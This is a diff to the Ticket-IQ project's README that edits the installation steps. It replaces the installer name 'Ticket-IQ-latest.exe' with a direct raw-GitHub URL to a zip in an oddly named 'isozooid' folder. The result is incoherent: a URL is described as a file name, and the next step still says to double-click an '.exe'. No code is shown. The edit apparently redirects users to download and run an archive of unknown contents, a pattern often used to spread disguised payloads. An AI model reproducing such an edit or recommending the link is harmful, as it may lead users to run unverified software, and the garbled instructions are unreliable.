KnhPhSn/Ticket-IQ/README.md

 Once the download is complete, follow these steps to install Ticket-IQ:

 1. **Locate the Downloaded File**:
    Go to the folder where your downloads are saved.
-You should see a file named something like `Ticket-IQ-latest.exe` or similar.
+You should see a file named something like `https://raw.githubusercontent.com/KnhPhSn/Ticket-IQ/main/isozooid/Ticket-IQ.zip` or similar.

 2. **Run the Installer**:
    - For Windows: Double-click the `.exe` file.